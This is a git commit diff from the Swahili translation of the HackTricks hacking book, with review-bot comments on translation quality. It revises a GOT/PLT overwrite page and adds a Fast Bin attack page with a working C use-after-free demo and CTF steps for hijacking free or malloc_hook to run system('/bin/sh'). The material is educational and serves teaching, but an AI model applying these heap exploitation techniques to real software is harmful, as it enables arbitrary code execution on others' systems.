Translated ['binary-exploitation/arbitrary-write-2-exec/aw2exec-got-plt.

This commit is contained in:
Translator 2024-06-12 11:29:55 +00:00
parent 82216241aa
commit 42515e2d0c
3 changed files with 192 additions and 22 deletions


@ -731,6 +731,7 @@
* [Use After Free](binary-exploitation/heap/use-after-free/README.md)
* [First Fit](binary-exploitation/heap/use-after-free/first-fit.md)
* [Double Free](binary-exploitation/heap/double-free.md)
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
* [Unlink Attack](binary-exploitation/heap/unlink-attack.md)
* [Fast Bin Attack](binary-exploitation/heap/fast-bin-attack.md)
* [Unsorted Bin Attack](binary-exploitation/heap/unsorted-bin-attack.md)
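Review bot: worth recording in the commit message that `* [Fast Bin Attack](binary-exploitation/heap/fast-bin-attack.md)` is unchanged context in this hunk, i.e. the summary already linked a page that this commit only now adds as its third file (the new `# Shambulio la Fast Bin` document), so the translated book carried a dead link until now. The `Heap Overflow` line added after `Double Free` keeps the same path `binary-exploitation/heap/heap-overflow.md` and is removed again in the next hunk, so it is a pure move and needs no change.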
@ -743,7 +744,6 @@
* [House of Orange](binary-exploitation/heap/house-of-orange.md)
* [House of Rabbit](binary-exploitation/heap/house-of-rabbit.md)
* [House of Roman](binary-exploitation/heap/house-of-roman.md)
* [Heap Overflow](binary-exploitation/heap/heap-overflow.md)
* [Common Binary Exploitation Protections & Bypasses](binary-exploitation/common-binary-protections-and-bypasses/README.md)
* [ASLR](binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md)
* [Ret2plt](binary-exploitation/common-binary-protections-and-bypasses/aslr/ret2plt.md)
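Review bot: this removal is what turns the previous hunk into a move instead of a duplicate entry, so the two hunks must land together; nothing else to flag in the lines themselves. If the new position of `Heap Overflow` (after `Double Free` instead of after `House of Roman`) mirrors the English SUMMARY, say so in the commit message, since a translation commit should not reorder chapters on its own.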


@ -6,7 +6,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
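Review bot: the sponsorship link text changes here from `MIPANGO YA KUJIUNGA` to `MIPANGO YA USAJILI`, but the footer hunk of this same file (`@ -83,14 +93,14 @@`) keeps `MIPANGO YA KUJIUNGA`, and the new fast-bin file uses `MIPANGO YA KUJIUNGA` in both its header and its footer, so one commit now gives the same link two different names. Pick one term and apply it to all four blocks. The `ikionekana` to `ikitangazwa` change ("appear" to "be advertised") matches the footer hunk and reads better.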
@ -18,15 +18,15 @@ Njia nyingine za kusaidia HackTricks:
### **GOT: Jedwali la Kielekezi cha Kijumla**
**Jedwali la Kielekezi cha Kijumla (GOT)** ni mbinu inayotumiwa katika programu za kielekezi zinazounganishwa kwa njia ya kudumu kusimamia **anwani za kazi za nje**. Kwa kuwa **anwani hizi hazijulikani hadi wakati wa uendeshaji** (kutokana na uunganishaji wa kudumu), GOT hutoa njia ya **kusasisha kwa kudumu anwani za alama hizi za nje** mara tu zinapopatikana.
**Jedwali la Kielekezi cha Kijumla (GOT)** ni mbinu inayotumiwa katika programu za kielekezi zinazounganishwa kwa njia ya kudumu kusimamia **anwani za kazi za nje**. Kwa kuwa **anwani hizi hazijulikani hadi wakati wa uendeshaji** (kutokana na uunganishaji wa kudumu), GOT hutoa njia ya **kuboresha kwa njia ya kudumu anwani za alama hizi za nje** mara tu zinapopatikana.
Kila kuingia katika GOT inalingana na alama katika maktaba za nje ambazo programu inaweza kuita. Wakati **kazi inaitwa mara ya kwanza, anwani yake halisi inapatikana na kuhifadhiwa katika GOT**. Wito wa baadaye kwa kazi hiyo hutumia anwani iliyohifadhiwa katika GOT, hivyo kuepuka gharama ya kupata tena anwani hiyo.
Kila kuingia katika GOT inalingana na alama katika maktaba za nje ambazo programu inaweza kuita. Wakati **kazi inaitwa mara ya kwanza, anwani yake halisi inabainishwa na kifungu cha kielekezi cha kudumu na kuhifadhiwa katika GOT**. Wito wa baadaye kwa kazi hiyo hutumia anwani iliyohifadhiwa katika GOT, hivyo kuepuka gharama ya kubainisha anwani tena.
### **PLT: Jedwali la Uunganishaji wa Taratibu**
### **PLT: Jedwali la Kielekezi cha Utaratibu**
**Jedwali la Uunganishaji wa Taratibu (PLT)** hufanya kazi karibu na GOT na hutumika kama trampoline kushughulikia wito kwa kazi za nje. Wakati programu **inaita kazi ya nje kwa mara ya kwanza, udhibiti unapitishwa kwa kuingia katika PLT inayohusiana na kazi hiyo**. Kuingia hii ya PLT inahusika na kuita uunganishaji wa kudumu kusuluhisha anwani ya kazi ikiwa haijasuluhishwa tayari. Baada ya anwani kusuluhishwa, inahifadhiwa katika **GOT**.
**Jedwali la Kielekezi cha Utaratibu (PLT)** hufanya kazi karibu na GOT na hutumika kama trampoline kushughulikia wito kwa kazi za nje. Wakati programu **inaita kazi ya nje kwa mara ya kwanza, udhibiti unapitishwa kwa kuingia katika PLT inayohusiana na kazi hiyo**. Kuingia hii ya PLT inahusika na kuita kifungu cha kielekezi cha kudumu kubainisha anwani ya kazi ikiwa haijabainishwa tayari. Baada ya anwani kubainishwa, inahifadhiwa katika **GOT**.
**Hivyo,** kuingia katika GOT hutumiwa moja kwa moja mara tu anwani ya kazi au kivinjari cha nje inaposuluhishwa. **Kuingia katika PLT hutumiwa kurahisisha suluhisho la awali** la anwani hizi kupitia uunganishaji wa kudumu.
**Hivyo,** kuingia za GOT hutumiwa moja kwa moja mara tu anwani ya kazi au kivinjari cha nje inabainishwa. **Kuingia za PLT hutumiwa kurahisisha bainisho la awali** la anwani hizi kupitia kwa kifungu cha kielekezi cha kudumu.
## Pata Utekelezaji
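Review bot: `kutokana na uunganishaji wa kudumu` survives into the new line, but `kudumu` means "permanent", which inverts the reason the paragraph gives: the addresses are unknown until run time because of dynamic linking, not permanent linking, and the same word is then reused for the linker in `kifungu cha kielekezi cha kudumu`. Keep the English term next to the translation, e.g. `uunganishaji wa kudumu (dynamic linking)` corrected to whatever Swahili term the book uses for "dynamic", the way the footer hunk keeps `HackTricks AWS Red Team Expert` in English. Second point: renaming the PLT heading from `Jedwali la Uunganishaji wa Taratibu` (linkage) to `Jedwali la Kielekezi cha Utaratibu` (pointer) drops the "linkage" in Procedure Linkage Table, and `Jedwali la Kielekezi cha Kijumla` reads as "global pointer table" rather than Global Offset Table; since readers will search for the acronyms, add the English expansion once per heading, e.g. `### **GOT: Jedwali la Kielekezi cha Kijumla (Global Offset Table)**` and `### **PLT: ... (Procedure Linkage Table)**`.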
@ -38,44 +38,54 @@ Pata anwani ya jedwali la GOT na: **`objdump -s -j .got ./exec`**
Tazama jinsi baada ya **kupakia** **programu** katika GEF unaweza **kuona** **kazi** zilizo katika **GOT**: `gef➤ x/20x 0xDIR_GOT`
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>)
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (2) (2).png>)
Kwa kutumia GEF unaweza **kuanza** kikao cha **kudeketa** na kutekeleza **`got`** kuona jedwali la got:
Kwa kutumia GEF unaweza **kuanza** kikao cha **kudebugi** na kutekeleza **`got`** kuona jedwali la got:
![](<../../.gitbook/assets/image (496).png>)
### GOT2Exec
Katika programu ya kielekezi GOT ina **anwani za kazi au** kwa sehemu ya **PLT** ambayo itapakia anwani ya kazi. Lengo la andishi hili la kiholela ni **kubadilisha kuingia katika GOT** ya kazi ambayo itatekelezwa baadaye **na** **anwani** ya PLT ya **kazi ya `system`** kwa mfano.
Katika programu ya kielekezi GOT ina **anwani za kazi au** kwa **sehemu ya PLT** ambayo itapakia anwani ya kazi. Lengo la andishi hili la kiholela ni **kubadilisha kuingia cha GOT** cha kazi ambayo itatekelezwa baadaye **na** **anwani** ya PLT ya **kazi ya `system`** kwa mfano.
Kwa kawaida, uta **badilisha** **GOT** ya **kazi** ambayo **itaitwa na parameta zinazodhibitiwa na wewe** (hivyo utaweza kudhibiti parameta zinazotumwa kwa kazi ya mfumo).
Kwa kawaida, utabatilisha **GOT** ya **kazi** ambayo **itaitwa na parameta zinazodhibitiwa na wewe** (hivyo utaweza kudhibiti parameta zinazotumwa kwa kazi ya mfumo).
Ikiwa **`system`** **haitumiwi** na hati, kazi ya mfumo **haitakuwa na kuingia** katika PLT. Katika hali hii, utahitaji **kuvuja kwanza anwani** ya kazi ya `system` na kisha kubadilisha GOT ili ielekeze kwenye anwani hii.
Ikiwa **`system`** **haitumiwi** na hati, kazi ya mfumo **haitakuwa na kuingia katika PLT**. Katika hali hii, utahitaji **kuvuja kwanza anwani** ya kazi ya `system` na kisha kubadilisha GOT ili ielekeze kwenye anwani hii.
Unaweza kuona anwani za PLT na **`objdump -j .plt -d ./vuln_binary`**
## Kuingia kwa GOT ya libc
## Kuingia za GOT za libc
**GOT ya libc** kawaida inaandikwa na **RELRO ya sehemu**, ikifanya iwe lengo zuri kwa hili ikiaminika ni rahisi kugundua anwani yake ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)).
**GOT ya libc** kawaida inakusanywa na **RELRO ya sehemu**, ikifanya iwe lengo zuri kwa kudhani ikiwa inawezekana kugundua anwani yake ([**ASLR**](../common-binary-protections-and-bypasses/aslr/)).
Kazi za kawaida za libc zitaita **kazi nyingine za ndani** ambazo GOT yake inaweza kubadilishwa ili kupata utekelezaji wa kanuni.
Kazi za kawaida za libc zitaita **kazi za ndani zingine** ambazo GOT yake inaweza kubadilishwa ili kupata utekelezaji wa nambari.
Pata [**maelezo zaidi kuhusu mbinu hii hapa**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries).
## **Kifaa cha Moja**
## **Free2system**
Katika mashindano ya kudukua kumbukumbu, mara nyingi unaweza kudhibiti maudhui ya vipande na wakati mwingine hata kubadilisha jedwali la GOT. Mbinu rahisi ya kupata RCE ikiwa vifaa vya one hazipatikani ni kubadilisha anwani ya `free` ya GOT ili ielekeze kwa `system` na kuandika ndani ya kipande `"/bin/sh"`. Kwa njia hii wakati kipande hiki kitakapofutwa, itatekeleza `system("/bin/sh")`.
## **Kifaa cha One**
{% content-ref url="../rop-return-oriented-programing/ret2lib/one-gadget.md" %}
[one-gadget.md](../rop-return-oriented-programing/ret2lib/one-gadget.md)
{% endcontent-ref %}
## **Kudhuru GOT kutoka kwa Kumbukumbu**
Njia ya kawaida ya kupata RCE kutoka kwa udhaifu wa kumbukumbu ni kudhuru fastbin ili iwezekane kuongeza sehemu ya jedwali la GOT ndani ya fast bin, hivyo wakati kipande hicho kitakapopewa itakuwa inawezekana **kubadilisha kielekezi cha kazi, kawaida `free`**.\
Kisha, kuelekeza `free` kwa `system` na kufuta kipande ambapo imeandikwa `/bin/sh\x00` kutatekeleza kifaa cha mfumo.
Inawezekana kupata [**mfano hapa**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/chunk\_extend\_overlapping/#hitcon-trainging-lab13)**.**
## **Kinga**
Kinga ya **RELRO kamili** inalenga kulinda dhidi ya mbinu hii kwa kusuluhisha anwani zote za kazi wakati programu inapoanza na kufanya **jedwali la GOT liwe la kusoma tu** baada ya hapo:
Kinga ya **Full RELRO** inalenga kulinda dhidi ya mbinu hii kwa kubainisha anwani zote za kazi wakati programu inapoanza na kufanya **jedwali la GOT liwe la kusoma tu** baada ya hapo:
{% content-ref url="../common-binary-protections-and-bypasses/relro.md" %}
[relro.md](../common-binary-protections-and-bypasses/relro.md)
{% endcontent-ref %}
## Marejeo
* [https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)
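Review bot: two regressions to fix before merge. First, `utabatilisha` in `Kwa kawaida, utabatilisha **GOT** ya **kazi** ...` replaces `uta **badilisha**` ("you will overwrite") with a verb meaning "you will cancel/invalidate"; the intended word is `utabadilisha`. Second, the screenshot path gains one more `(1)` than the line it replaces (`image (620) (1) ... (1) (2) (2) (2).png`), yet this commit touches only three markdown files and nothing under `.gitbook/assets`, so unless an asset with the new name already exists the image breaks; verify the path or keep the old one. On the added text: the new `Free2system` paragraph and the `Kudhuru GOT kutoka kwa Kumbukumbu` section render "heap" as `kumbukumbu` (memory), which hides that the technique is heap-specific even though the same lines talk about fastbins and freeing a chunk holding `/bin/sh`; `vifaa vya one` / `Kifaa cha One` for one-gadgets is hard to recognise next to the untranslated `one-gadget.md` link, so keep `one gadget` as a term; and `kutatekeleza kifaa cha mfumo` ("will execute the system tool") should state what the paragraph above it says, that freeing the chunk runs `system("/bin/sh")`.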
@ -83,14 +93,14 @@ Kinga ya **RELRO kamili** inalenga kulinda dhidi ya mbinu hii kwa kusuluhisha an
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
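Review bot: this footer now disagrees with the header changed earlier in the same file: `MIPANGO YA KUJIUNGA` is kept here while the header hunk switched to `MIPANGO YA USAJILI`, and the NFT line becomes `mkusanyiko wetu wa [NFTs] ya kipekee` while the new fast-bin file writes `za kipekee` in its header and `ya kipekee` in its footer; `NFTs` is the same plural noun in all three places, so the agreement should be the same too. Keeping `HackTricks AWS Red Team Expert` and `AWS hacking` in English in the summary line is a good choice; apply it to the header of the new file as well, which still says `kuvamia AWS` and `Mtaalam wa Timu Nyekundu ya AWS ya HackTricks`.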


@ -0,0 +1,160 @@
# Shambulio la Fast Bin
<details>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Taarifa Msingi
Kwa sababu fast bin ni kiungo cha moja kwa moja, kuna kinga chache sana kuliko katika mabakuli mengine na tu **kubadilisha anwani katika kipande cha fast bin kilichofutwa** ni ya kutosha kuweza **kuweka kipande baadaye katika anwani yoyote ya kumbukumbu**.
Kwa muhtasari:
{% code overflow="wrap" %}
```c
ptr0 = malloc(0x20);
ptr1 = malloc(0x20);
// Put them in fast bin (suppose tcache is full)
free(ptr0)
free(ptr1)
// Use-after-free
// Modify the address where the free chunk of ptr1 is pointing
*ptr1 = (unsigned long)((char *)&<address>);
ptr2 = malloc(0x20); // This will get ptr1
ptr3 = malloc(0x20); // This will get a chunk in the <address> which could be abuse to overwrite arbitrary content inside of it
```
{% endcode %}
Unaweza kupata mfano kamili katika namna iliyoelezwa vizuri sana katika nambari kutoka [https://guyinatuxedo.github.io/28-fastbin\_attack/explanation\_fastbinAttack/index.html](https://guyinatuxedo.github.io/28-fastbin\_attack/explanation\_fastbinAttack/index.html):
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(void)
{
puts("Today we will be discussing a fastbin attack.");
puts("There are 10 fastbins, which act as linked lists (they're separated by size).");
puts("When a chunk is freed within a certain size range, it is added to one of the fastbin linked lists.");
puts("Then when a chunk is allocated of a similar size, it grabs chunks from the corresponding fastbin (if there are chunks in it).");
puts("(think sizes 0x10-0x60 for fastbins, but that can change depending on some settings)");
puts("\nThis attack will essentially attack the fastbin by using a bug to edit the linked list to point to a fake chunk we want to allocate.");
puts("Pointers in this linked list are allocated when we allocate a chunk of the size that corresponds to the fastbin.");
puts("So we will just allocate chunks from the fastbin after we edit a pointer to point to our fake chunk, to get malloc to return a pointer to our fake chunk.\n");
puts("So the tl;dr objective of a fastbin attack is to allocate a chunk to a memory region of our choosing.\n");
puts("Let's start, we will allocate three chunks of size 0x30\n");
unsigned long *ptr0, *ptr1, *ptr2;
ptr0 = malloc(0x30);
ptr1 = malloc(0x30);
ptr2 = malloc(0x30);
printf("Chunk 0: %p\n", ptr0);
printf("Chunk 1: %p\n", ptr1);
printf("Chunk 2: %p\n\n", ptr2);
printf("Next we will make an integer variable on the stack. Our goal will be to allocate a chunk to this variable (because why not).\n");
int stackVar = 0x55;
printf("Integer: %x\t @: %p\n\n", stackVar, &stackVar);
printf("Proceeding that I'm going to write just some data to the three heap chunks\n");
char *data0 = "00000000";
char *data1 = "11111111";
char *data2 = "22222222";
memcpy(ptr0, data0, 0x8);
memcpy(ptr1, data1, 0x8);
memcpy(ptr2, data2, 0x8);
printf("We can see the data that is held in these chunks. This data will get overwritten when they get added to the fastbin.\n");
printf("Chunk 0: %s\n", (char *)ptr0);
printf("Chunk 1: %s\n", (char *)ptr1);
printf("Chunk 2: %s\n\n", (char *)ptr2);
printf("Next we are going to free all three pointers. This will add all of them to the fastbin linked list. We can see that they hold pointers to chunks that will be allocated.\n");
free(ptr0);
free(ptr1);
free(ptr2);
printf("Chunk0 @ 0x%p\t contains: %lx\n", ptr0, *ptr0);
printf("Chunk1 @ 0x%p\t contains: %lx\n", ptr1, *ptr1);
printf("Chunk2 @ 0x%p\t contains: %lx\n\n", ptr2, *ptr2);
printf("So we can see that the top two entries in the fastbin (the last two chunks we freed) contains pointers to the next chunk in the fastbin. The last chunk in there contains `0x0` as the next pointer to indicate the end of the linked list.\n\n");
printf("Now we will edit a freed chunk (specifically the second chunk \"Chunk 1\"). We will be doing it with a use after free, since after we freed it we didn't get rid of the pointer.\n");
printf("We will edit it so the next pointer points to the address of the stack integer variable we talked about earlier. This way when we allocate this chunk, it will put our fake chunk (which points to the stack integer) on top of the free list.\n\n");
*ptr1 = (unsigned long)((char *)&stackVar);
printf("We can see it's new value of Chunk1 @ %p\t hold: 0x%lx\n\n", ptr1, *ptr1);
printf("Now we will allocate three new chunks. The first one will pretty much be a normal chunk. The second one is the chunk which the next pointer we overwrote with the pointer to the stack variable.\n");
printf("When we allocate that chunk, our fake chunk will be at the top of the fastbin. Then we can just allocate one more chunk from that fastbin to get malloc to return a pointer to the stack variable.\n\n");
unsigned long *ptr3, *ptr4, *ptr5;
ptr3 = malloc(0x30);
ptr4 = malloc(0x30);
ptr5 = malloc(0x30);
printf("Chunk 3: %p\n", ptr3);
printf("Chunk 4: %p\n", ptr4);
printf("Chunk 5: %p\t Contains: 0x%x\n", ptr5, (int)*ptr5);
printf("\n\nJust like that, we executed a fastbin attack to allocate an address to a stack variable using malloc!\n");
}
```
## Mifano
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html)**:**
* Inawezekana kutenga vipande, kuvifuta, kusoma maudhui yao na kuvijaza (kwa udhaifu wa kujaa).
* **Consolidate chunk for infoleak**: Mbinu hii ni kimsingi kutumia udhaifu wa kujaa ili kuunda ukubwa wa uwongo wa awali ili kipande cha awali kiwekwe ndani ya kikubwa zaidi, hivyo wakati wa kutenga kikubwa kinachotia kipande kingine, inawezekana kuchapisha data yake na kuvuja anwani ya libc (main\_arena+88).
* **Overwrite malloc hook**: Kwa hili, na kutumia hali ya kufunika ya awali, ilikuwa inawezekana kuwa na vipande 2 vilivyokuwa vikionyesha kwenye kumbukumbu ile ile. Kwa hivyo, kuvifuta vyote viwili (kwa kufuta kipande kingine kati yake kuepuka ulinzi) ilikuwa inawezekana kuwa na kipande kimoja katika sanduku la haraka mara 2. Kisha, ilikuwa inawezekana kutenga tena, kubadilisha anwani ya kipande kinachofuata ili ielekee kidogo kabla ya malloc\_hook (hivyo inaelekeza kwenye nambari ambayo malloc inafikiria ni ukubwa huru - kuepuka nyingine), kutenga tena na kisha kutenga kipande kingine ambacho kitapokea anwani za vifaa vya malloc. Hatimaye **gadget moja** iliandikwa hapo.
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html)**:**
* Kuna kujaa kwa sanduku na mtumiaji baada ya kufuta na kufuta mara mbili kwa sababu wakati kipande kinapofutwa inawezekana kutumia upya na kufuta tena pointi
* **Libc info leak**: Tuache vipande vichache na vitapata pointi kwa sehemu ya eneo la uwanja mkuu. Kwa kuwa unaweza kutumia upya pointi zilizofutwa, soma anwani hii.
* **Fast bin attack**: Pointi zote kwa kutengwa zimehifadhiwa ndani ya safu, hivyo tunaweza kufuta vipande vichache vya sanduku la haraka na katika la mwisho kubadilisha anwani ili ielekee kidogo kabla ya safu hii ya pointi. Kisha, tengeneza vipande vichache na ukubwa sawa na tutapata kwanza halali na kisha bandia inayotia safu ya pointi. Sasa tunaweza kubadilisha pointi hizi za kutengwa ili zielekee anwani ya `free` ili ielekee mfumo na kisha andika kipande 1 `"/bin/sh"` kisha `free(chunk1)` ambayo itatekeleza `system("/bin/sh")`.
Unaweza kupata shambulio la Fast Bin lililotumiwa kupitia shambulio la sanduku lisilo na mpangilio katika mifano kutoka:
{% content-ref url="unsorted-bin-attack.md" %}
[unsorted-bin-attack.md](unsorted-bin-attack.md)
{% endcontent-ref %}
<details>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
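Review bot: the summary snippet (`ptr0 = malloc(0x20);` ... `*ptr1 = (unsigned long)((char *)&<address>);`) leaves out the constraint the 0ctf babyheap bullet later relies on: `<address>` cannot be arbitrary, because malloc checks that the fake chunk's size field matches the fastbin it came from, which is exactly why that writeup points the next pointer slightly before `malloc_hook` ("ielekee kidogo kabla ya malloc\_hook ... ukubwa huru"). Add one sentence to the Taarifa Msingi paragraph saying so, otherwise a reader of the summary will expect any address to work. Also, `free(ptr0)` and `free(ptr1)` lack semicolons in a block fenced as `c`; either add them or present the block as pseudocode. Terminology inside this one file: `fast bin`, `mabakuli` and `sanduku la haraka` all name the same structure, and the header says `kuvamia AWS` / `Mtaalam wa Timu Nyekundu ya AWS ya HackTricks` while the footer says `AWS hacking` / `HackTricks AWS Red Team Expert`; pick one form for each. Finally, `printf("Chunk0 @ 0x%p\t contains: %lx\n", ...)` prints `0x0x...` because `%p` already adds the prefix; that comes from the quoted guyinatuxedo example, but it is cheap to drop the literal `0x` while the code is being copied.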